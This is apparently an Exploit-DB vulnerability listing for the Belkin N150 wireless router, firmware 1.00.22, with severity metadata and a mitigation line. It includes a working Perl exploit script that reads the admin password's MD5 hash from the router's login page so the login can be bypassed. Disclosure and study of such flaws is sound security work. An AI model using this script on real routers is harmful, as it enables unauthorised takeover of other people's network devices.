Belkin N150 Wireless MD5 Password Disclosure

vendor:

N150 Wireless Router

by:

Avinash Tangirala

7.5

CVSS

HIGH

Password Disclosure

798

CWE

Product Name: N150 Wireless Router

Affected Version From: 1.00.22

Affected Version To: 1.00.22

Patch Exists: NO

Related CWE:

CPE: h:belkin:f7d1301_v1

Metasploit:

Other Scripts:

Platforms Tested:

2010

Belkin N150 Wireless MD5 Password Disclosure

The Router's web interface on default 192.168.2.1 reveals the administrator password in MD5 hash, allowing bypass of the login.

Mitigation:

Update to a firmware version that fixes the issue.

Source

Exploit-DB raw data:

============================================
Belkin N150 Wireless MD5 Password Disclosure
============================================


Firmware Version :  1.00.22 (Aug 31 2010 14:36:01)
Boot Version     :  1.20 
Hardware         :  F7D1301 v1 (01A) 
Author           :  Avinash Tangirala

======================
Vulnerability Details:
======================

The Router's web interface on default 192.168.2.1 reveals the administrator password in MD5 hash thereby one can bypass the login completely.
There is a similar exploit for Belkin G wireless router by aodrulez. Therefore this exploit might* work possibly on every Belkin router created :D.

=========
Exploit :
=========
 
#/usr/bin/perl
use strict; 
use LWP::Simple;
print "\n  'Belkin N150 Wireless Router' Admin Exploit ";
print "\n ---------------------------------------------\n\n";
print "[+] Enter the Router's IP Address : ";
my $ip=<STDIN>;
chomp($ip);
$ip=get("http://".$ip."/login.stm") or die "\n[!] check ip and try again \n";
my @arr=$ip =~ m/var password = "(.*)";/g;
print "[+] Admin Password = ".@arr[0]." (MD5 Hash).\n";


==========
Greetz to:
==========

1.) Aodrulez  :  My Mentor 
2.) Arkz
3.) neurotoxIN
4.) www.codeeleven.in